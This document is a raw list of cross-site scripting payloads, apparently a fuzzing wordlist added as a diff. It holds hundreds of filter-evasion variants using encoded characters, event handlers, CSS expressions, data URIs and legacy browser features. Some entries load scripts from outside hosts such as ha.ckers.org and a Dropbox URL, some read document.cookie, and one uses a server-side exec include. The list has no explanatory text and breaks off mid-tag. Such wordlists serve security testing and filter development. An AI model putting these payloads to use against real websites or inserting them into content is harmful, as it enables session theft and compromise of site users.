\x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> 
+"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +"><img src=x onerror=javascript:alert(1)> +"><img src=x onerror=javascript:alert('1')> +"><img src=x onerror=javascript:alert("1")> +"><img src=x onerror=javascript:alert(`1`)> +"><img src=x onerror=javascript:alert(('1'))> +"><img src=x onerror=javascript:alert(("1"))> +"><img src=x onerror=javascript:alert((`1`))> +"><img src=x onerror=javascript:alert(A)> +"><img src=x onerror=javascript:alert((A))> +"><img src=x onerror=javascript:alert(('A'))> +"><img src=x onerror=javascript:alert('A')> +"><img src=x onerror=javascript:alert(("A"))> +"><img src=x onerror=javascript:alert("A")> +"><img src=x onerror=javascript:alert((`A`))> +"><img src=x onerror=javascript:alert(`A`)> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x 
onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE 
TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT 
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe src="&Tab;javascript:prompt(1)&Tab;"> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt >alert&lpar;1&rpar; {Opera} +<img/src=`` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=``&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? 
+<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /**/>/**/alert(1)/**/</script /**/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'> +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' 
onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe// src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 